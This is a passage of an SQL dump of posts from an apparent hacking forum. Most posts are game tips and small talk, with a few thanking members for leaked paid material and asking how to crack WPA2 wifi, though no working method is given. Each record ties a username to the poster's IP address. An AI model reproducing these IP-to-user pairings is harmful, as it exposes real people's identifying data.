`message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5818', '889', '4842', '3', 'RE: Vote for a new theme', '0', '61', 'NXK', '1350774985', 'I like number 1 and our current theme. But Id love to see change :)', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '8ff6d2dac8485ce334966257dd06ee4c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5819', '1016', '5809', '7', 'RE: Flying Steps', '0', '2', 'Apathy', '1350775311', 'Interesting watch thanks.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', 'e3ee5e97c6733612d8894e397867eb7a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5820', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1350776407', 'http://eune.leagueoflegends.com/news/inside-design-weaving-spider-queens-web', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '1ff34557137c07c95ed75170d1436ad1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5821', '1008', '5702', '24', 'RE: Desktop or Lappy?', '0', '228', 'VirtualLegend', '1350780189', 'I\'m using my computer for hardcore gaming and my laptop for homework.', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '18f9770ee9a0a971bc514793c9e77cf8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5822', '1017', '0', '11', 'Wifi hacking help :O', '0', '257', 'XxTREYZxX', '1350782543', 'Hey L33T, I need some help! Can some one please give me a step by step tut on how to hack a wifi connection. It is a WPA2-PSK Thanks guys hope i learn how to do it :P', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '74ce0ff28c4ebe92f598b01dade94856', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5823', '936', '5257', '18', 'RE: 4 adf.ly bots with proxygrabber', '0', '257', 'XxTREYZxX', '1350782763', 'thanks for the share and keep up the good work ;)', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '07a4013b116dd68406286c5517853b44', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5824', '989', '5544', '68', 'RE: Free Proxy script , Make your own Proxy browsing site like Hidemyass!!!', '0', '257', 'XxTREYZxX', '1350784327', 'thanks for the great share keep up the good work', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '9b46e70d3957a4b462904d92218c9732', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5825', '983', '5794', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '257', 'XxTREYZxX', '1350784760', '[quote=\'NXK\' pid=\'5794\' dateline=\'1350767565\'] Some leecher probably stole them, Ill check my accounts that i have if they\'re still working and Ill replace them for you. [/quote] thats nice of you but i will just do another giveaway :O', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '65d4ab50519662dee5906af9d7fcea1c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5826', '1018', '0', '47', 'giving away premium account', '0', '257', 'XxTREYZxX', '1350785225', 'HEY L33T, WHATS UP AND TODAY I AM GIVING AWAY ANOTHER PREMIUM MY MOTHER BOUGHT FOR ME (I SHOULDN\'T BE DOING THIS LOL) POST BELOW SAYING WHY YOU SHOULD GET THIS ACCOUNT. YOU CAN DO YOUR OWN LAYOUT FOR EXAMPLE; NAME: ACT. ACT. ACT AND SO ONE :)', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '2b7e8f13441bccddf4c43928886821dc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5827', '948', '5719', '74', 'RE: MINECRAFT world download', '0', '257', 'XxTREYZxX', '1350788296', '[quote=\'iTzIpod\' pid=\'5719\' dateline=\'1350746029\'] Close it then.... Don\'t spam with useless posts please. \"lol i was just about to close it.\" And fix your grammar. I don\'t wanna see any LQ posts on a HQ forum. You\'re causing all of this.. [/quote] My grammar is fine, one capital isn\'t a big deal :)', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '8fe319207c2f36f2007aaa75f30079d5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5828', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '3', '??????????¢™', '1350788352', 'Im not a graphics artist but if I was I would have been glad to help you. To me it seems like there is too much space.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', 'b7b4e3ab0e58e904271692e19537795d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5830', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '257', 'XxTREYZxX', '1350788590', 'I will be closing this thread now to prevent spam :O', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '79ee697341b3ceafc69fed8c37be5f83', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5831', '1000', '5654', '3', 'RE: Congrats NXK and ??????????¢™', '0', '1', 't3h jok3r', '1350789911', 'Don\'t you guys understand that there\'s a reason why this is closed?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '77f2f1582ca5b3fbfedae83f749f0054', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5832', '190', '665', '56', 'RE: Copy and paste game', '0', '1', 't3h jok3r', '1350789934', 'Closed because it reached 100 replies.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5b4483e8fe844d9105da82fdb6c16e6b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5833', '1015', '5791', '7', 'RE: Grounded', '0', '1', 't3h jok3r', '1350790063', 'Lol mothered. I don\'t ever get grounded no matter what the case might be.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '284704fcbcedb0b2468c8245673b61de', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5834', '1002', '5789', '3', 'RE: New mods and forum updates', '0', '1', 't3h jok3r', '1350790108', '[quote=\'??????????¢™\' pid=\'5789\' dateline=\'1350763410\'] I was the one that showed that screenshotted that pic at the end. LOL [/quote] OK I added your name.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0cbcdce78ac4e64e833e5c0fc94a7f25', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5835', '945', '5788', '7', 'RE: I dont want.......', '0', '1', 't3h jok3r', '1350790195', '[quote=\'??????????¢™\' pid=\'5788\' dateline=\'1350763250\'] Its going to be post and PM for a while or Post here and I pm you. [/quote] I would recommend you not to do it \"for a while\" because L33T Hacking is not really a post here and PM me website.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0f2fb286304501d76c829167e5664f0c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5836', '1019', '0', '3', 'Do you like your new?', '0', '1', 't3h jok3r', '1350797591', 'Yay! Yippee.. Awesome nice edition. Awards system has finally been added to L33T Hacking but unfortunately there\'s no awards page and I had to manually grant each user an award so I missed out a couple of people that received awards in the starting of LH. I will post another thread soon about what awards we have and who can grant them. Check out our awards help document for more updated information [url=http://l33thacking.net/misc.php?action=help&hid=12]here[/url]', '72.231.24.165', '1223104677', '1', '0', '1', '1350802353', '1', '9f4764fc60e990e2bdb8f99385222436', '0', '1350802353'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5837', '1019', '5836', '3', 'RE: Do you like your new?', '0', '257', 'XxTREYZxX', '1350797666', 'Yes the award system is back.i\'m so happy about this. great work admin :)', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'e97e7dfcb3ff21bb3112b5466021a080', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5838', '1015', '5791', '7', 'RE: Grounded', '0', '257', 'XxTREYZxX', '1350797804', 'I get grounded but i still play computer under my pillow ahha lol', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '3e68ac9a98e75034d2fa0268a4c91aa7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5839', '978', '5461', '73', 'RE: IOS vs ANDROID', '0', '257', 'XxTREYZxX', '1350799430', 'thanks guys for all your replies i think android wins with a score of 3-1 This Thread has dserved its purpose and i will be closing the thread now :O', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '6290cc3ecfbc370ce19154743c007de7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5840', '1020', '0', '73', 'How to make your ipod\'s battery 90 percent longer', '0', '257', 'XxTREYZxX', '1350799793', 'hello and i will be telling you how to make your Ipod 90 PERCENT LONGER. Turn the brightness all the way down. If you don\'t need Internet, turn airplane mode on under settings (makes battery last about 75% longer, and don\'t download anything. Doing all of these will honestly make the battery last about 90% longer.:cool:', '203.104.11.12', '-882373876', '1', '0', '1', '1351653632', '1', '92ee19364d3b9a2e8eb2b33fc307d99e', '0', '1351653632'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5841', '1001', '5808', '7', 'RE: Shady URL', '0', '258', 'PiXEL^OG', '1350799870', '[quote=\'mothered\' pid=\'5808\' dateline=\'1350771927\'] [quote=\'XTr3ME PiX3L\' pid=\'5690\' dateline=\'1350724696\'] Credits go to Greed aka Ryuniz on UB for sharing this , You need to add credits NOW [/quote] As mentioned In my Initial post: \"I came across this on another forum, so I don\'t take credit In finding It myself.\" On topic, glad you all like It :) [/quote] lol i did not see that , Anyways good post', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '9917f7993746759e591c484bbbfce81c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5842', '1021', '0', '76', 'rage cheats and tips', '0', '257', 'XxTREYZxX', '1350800076', 'hello here are some accounts :) Easy money In Subway Town, you can purchase rotating deals from Stew. Sometimes you are able to purchase items at a discount that can immediately be sold at Jani\'s Supplies for a higher price. For example, Stew will sell you Viper Rockets for $66, which you can sell to Jani for $75. Repeat this as much as desired. Picking up distant items with a scope Equip your pistol, and aim at an item with the scope (monocular). As you let go of L2, tap [Pick Up] quickly and repeatedly. If done correctly, you should pick up the item and have it in your inventory. This glitch also works on dead guards. Note: This glitch was done on an unpatched version of the game. Hidden Doom room In the Gearhead Vault, you must interact with seven different computer keyboards in the office where you fight the two Gearhead Bosses. There is no prompt to interact with the keyboards, but you will hear a sound from Doom with each successful activation, and a Doom demon growl sound after all seven are activated. After all seven keyboards have been pressed, go back towards the Gearhead Vault\'s exit (beginning of the level). Open the door, and jump on top of the barrel to your left. Jump on top of the box in front of the door, and crouch to enter. Inside is a platform that will teleport you to the secret Doom room, with a Marine Bobblehead item that can be sold for $150.', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'b9bd83275934fbe3602c6876e3eda910', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5843', '1022', '0', '72', 'how to make you pro at sniping MW3', '0', '257', 'XxTREYZxX', '1350800397', 'hello here is the ultimate guide on how to snipe like a pro :O [color=#1E90FF] Within MW3, each map has it\'s pros and cons for sniping. Some maps favor snipers by giving them long, open, high traffic areas to sit and pick people off, while others give a few spots to sit and wait for someone to come along. Most times, the maps will provide enough cover that you can conceal yourself, but a few marked on these maps will leave you open. In those areas, I suggest planning an escape route before you decide to use them. Anyways, check out the maps below. I\'ve marked where you can get decent sniping in. Try them out in a private match to familiarize yourself with them, and remember, the best snipers are never seen, never heard, and never in the same spot twice. Think before you snipe. =] I\'ve decided to utilize the new Elite HD Maps (which you can find on elite in the \"Improve\" section.) Also, I will place the dlc maps in here for someone to save and work on themselves. (since I won\'t be buying them, therefore I can\'t give any accurate information) - This is just for reference on what means what. - Arkaden (Not the greatest map for sniping, but there are a few spots) - Bakaara (Definitely one of the more prominent sniping maps) - Bootleg (Again, not the best, but there are a few spots) - Carbon (A decent map for sniping, expect to be killed though) - Downturn (Big map, lots of rubble, horrible for sniping) - Fallen (A good choice for snipers, lots of spots and getaway routes) - Interchange (If you pick the right spot, you can get plenty of kills) - Lockdown (One of those maps that favors both assault and sniping) - Mission (This was designed for sniping. Pretty much wherever you go you can snipe) - Outpost (Lots of long sight-lines, cover, and a bunker! Great for sniping [Thermal works great]) - Resistance (Another decent map, more for the assault class) - Seatown (Stay to the right side of the map and you can dominate) - Underground (Probably going to get killed a lot. Not a whole lot of spots, easily flanked) - Village (As you can see there is a very high traffic area with lots of surrounding sniping positions) You might be wondering where Dome and Hardhat are. Well I\'ve never sniped there, why would I? They\'re too damn small! thanks hoped you enjoy.[/color]', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '9dbe7422f2496fcafbd62ee4a39a0f79', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5844', '1023', '0', '4', 'New member here!!', '0', '258', 'PiXEL^OG', '1350800921', 'Some of you may have seen me around as XTr3ME PiX3L but i changed it PiXEL^OG Anyways this forum looks really nice and i thought about joining it since everywhere i go i always run into assholes and rude people so i hope there are nice people here :) Ive basically done it all , all fields in hacking especially Web hacking so i can share my knowledge here. Been in the hacking scene for like 3 years and been learning non-stop ever since!! (i still have a life though lol) Anyways nice to meet you all :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'd982774910bec976a1767b03fc5a7215', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5845', '1023', '5844', '4', 'RE: New member here!!', '0', '257', 'XxTREYZxX', '1350801239', 'hey whats up welcome to L33T, i used to be XxTREYZxX and now im ????. enjoy your stay and please be active:O', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '8f1d5cd7e40587053c025bd0f15ca139', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5846', '457', '2149', '29', 'RE: Get free Alienware Laptops [Secret Loophole of Dell Revealed](Limited Edition)', '0', '258', 'PiXEL^OG', '1350801791', 'Hay Thanks Mistacode!! :) Really good share', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'faf1eace68ffc1fdd6c2f498df50503b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5847', '459', '2151', '29', 'RE: Affiliate Marketing [Price: 8$]', '0', '258', 'PiXEL^OG', '1350801984', 'Alright Thank you so much man!!! I hate Sonex he an asshole Thanks for leaking his book +rep added :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'b119971174800c440edcbe3473bcc671', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5848', '457', '2149', '29', 'RE: Get free Alienware Laptops [Secret Loophole of Dell Revealed](Limited Edition)', '0', '257', 'XxTREYZxX', '1350802060', 'Thanks for the great share bud keep up the good work :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'b5f36b5f241171f917005f112abd98fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5849', '459', '2151', '29', 'RE: Affiliate Marketing [Price: 8$]', '0', '257', 'XxTREYZxX', '1350802145', 'thanks for the great share appreciated :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'b95260c53d9c5ebe027e7b1dc390bed7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5850', '413', '1899', '29', 'RE: EARN $50/HOUR EASILY', '0', '258', 'PiXEL^OG', '1350802165', 'Thanks for this mate , gonna try it :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'a95ac81a775952ebc7942463a2f7c223', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5851', '1023', '5845', '4', 'RE: New member here!!', '0', '258', 'PiXEL^OG', '1350802262', '[quote=\'xEP1C_SC0P3Sx\' pid=\'5845\' dateline=\'1350801239\'] hey whats up welcome to L33T, i used to be XxTREYZxX and now im ????. enjoy your stay and please be active:O [/quote] Yeah ive seen you around UB , Thanks for the welcome :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '152867fba41a59415d0bd2845de386e3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5852', '1023', '5844', '4', 'RE: New member here!!', '0', '1', 't3h jok3r', '1350802270', 'Welcome to L33T Hacking. Thanks for signing up and helping us keep LH up. We have a lot of nice members around here, we treat each other like family.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '896933a582231f71d6e20504a3cdfd3d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5853', '1023', '5852', '4', 'RE: New member here!!', '0', '257', 'XxTREYZxX', '1350802454', '[quote=\'t3h jok3r\' pid=\'5852\' dateline=\'1350802270\'] Welcome to L33T Hacking. Thanks for signing up and helping us keep LH up. We have a lot of nice members around here, we treat each other like family. [/quote] yes we do aye joker ahha lol of course l33T is our home basically :)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '4ae79166dd23775837cfdda252e19730', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5854', '413', '1899', '29', 'RE: EARN $50/HOUR EASILY', '0', '257', 'XxTREYZxX', '1350802535', 'Thanks for the great share bud, keep up the good work :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '22cd511ed2a2ea3d1e585fd03b850abe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5855', '1017', '5822', '11', 'RE: Wifi hacking help :O', '0', '53', 'sirchamp', '1350805414', 'WAP2 .... You have to bruteforce it. Or se.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '71a77196b0909dcafc41717020041af2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5856', '1017', '5822', '11', 'RE: Wifi hacking help :O', '0', '257', 'XxTREYZxX', '1350805796', 'can you please give me a step by step tut on it thanks', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', 'a85c6791abb8d63445e6c4fb43434458', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5857', '1024', '0', '72', 'mw3 intell locations.', '17', '257', 'XxTREYZxX', '1350809785', 'hey l33T, here are the intell locations [color=#00BFFF][video=youtube]http://www.youtube.com:80/embed/TUwZckn1Fig[/video] hope you enjoy all rights go to TUwZckn1Fig :O[/color]', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '16880a3f50d088c5b591b8bc449067d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5858', '1025', '0', '72', 'mw3 Black tuesday intell location', '17', '257', 'XxTREYZxX', '1350810091', 'hey here are all the black Tuesday intell locations: [color=#0000CD]Black Tuesday (5 intel items) 1. Inside the apartment building, check to the right of the crashed helicopter to find a bedroom. The intel is at the foot of the bed. 2. Descend the steps leading into the store, then turn around and look for a piece of intel on a desk under the staircase. 3. As soon as you enter the lobby of the stock exchange, check the left side of the room. 4. On one of the circular desks in the southwest corner of exchange floor, near the steps leading up. 5. As soon as your objective is to plant a thermite charge on the jammer, look to the right side of the rooftop for a table with the intel on it. hope i helped :O[/color]', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '43ab064b31cc8d9a03acdc1499b503f9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5859', '1017', '5822', '11', 'RE: Wifi hacking help :O', '0', '53', 'sirchamp', '1350814972', 'Sent you a wpa(2) hacking tut. If it requires to much work you can just buy a wpa(2) hacking service. they cost about 20 dollars if they succed.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '1d3ed0c5454df23418838a3b9b500c73', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5860', '413', '1899', '29', 'RE: EARN $50/HOUR EASILY', '0', '62', 'R?????zo?', '1350819233', 'Thanks gonna try that now :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd478022eb277c3582799851d40ae3de5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5861', '1023', '5844', '4', 'RE: New member here!!', '0', '62', 'R?????zo?', '1350819394', 'welcome bro, stay active and HQ.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '805ace7083334ef3aa33fe843400092d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5862', '1020', '5840', '73', 'RE: How to make your ipod\'s battery 90 percent longer', '0', '62', 'R?????zo?', '1350819477', 'Nice tips, even though I can\'t use airplane mode on my iphone (i know this is for IPOD) but the brightness I might use that :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 